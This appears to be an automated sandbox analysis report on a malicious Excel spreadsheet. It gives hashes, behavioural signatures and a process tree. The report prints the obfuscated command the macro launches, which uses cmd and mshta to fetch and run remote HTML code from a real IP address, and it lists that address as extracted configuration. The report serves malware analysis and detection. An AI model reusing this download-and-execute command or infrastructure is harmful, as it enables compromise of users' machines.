Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 00:36
Behavioral task
behavioral1
Sample
3ee11be1ab0b3f9e9bf14fd4a9c36e3fbd7e2ab3020c77f8b632491f613d9033.xls
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
3ee11be1ab0b3f9e9bf14fd4a9c36e3fbd7e2ab3020c77f8b632491f613d9033.xls
Resource
win10v2004-20241007-en
General
-
Target
3ee11be1ab0b3f9e9bf14fd4a9c36e3fbd7e2ab3020c77f8b632491f613d9033.xls
-
Size
65KB
-
MD5
5ed645d805d6e4a8e25f6a88dcd77925
-
SHA1
17f632acf18222e948c5cebdb8984e4181880fdd
-
SHA256
3ee11be1ab0b3f9e9bf14fd4a9c36e3fbd7e2ab3020c77f8b632491f613d9033
-
SHA512
efead51504ad224258db601ff3fa0867237a84ce5cdaeedcfc7d11524732e1a18b00ab4adab9d75c07d7a96f5a0803e8abade8f1511b92ca8144e32ec79dfabb
-
SSDEEP
1536:zVyk3hbdlylKsgqopeJBWhZFGkE+cL2NdAwzMk9B+oowzMk9A+oos:z8k3hbdlylKsgqopeJBWhZFGkE+cL2N/
Malware Config
Extracted
http://87.251.86.178/pp/aa.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3184 4240 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 21 3740 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4240 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE 4240 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 4240 wrote to memory of 3184 4240 EXCEL.EXE cmd.exe PID 4240 wrote to memory of 3184 4240 EXCEL.EXE cmd.exe PID 3184 wrote to memory of 3740 3184 cmd.exe mshta.exe PID 3184 wrote to memory of 3740 3184 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\3ee11be1ab0b3f9e9bf14fd4a9c36e3fbd7e2ab3020c77f8b632491f613d9033.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/aa.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\mshta.exemshta http://87.251.86.178/pp/aa.html3⤵
- Blocklisted process makes network request
PID:3740
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD59729553359e17dbe10aaf4e45ee2c6ab
SHA1947fea79a83a463053c0af526ba3b84dbeb455d8
SHA256d20d63078816d2b2981ac6e18c2a3621da5efa57d14321b11afd43e73e3df7d2
SHA512f960743d7aff0f0f7a1622666f3b232041529a397cc13d4061726963ab0eb465e0dee0f3f27c13472384f27e3210a73287e30d350d9e354c34bbcc14bd089ea7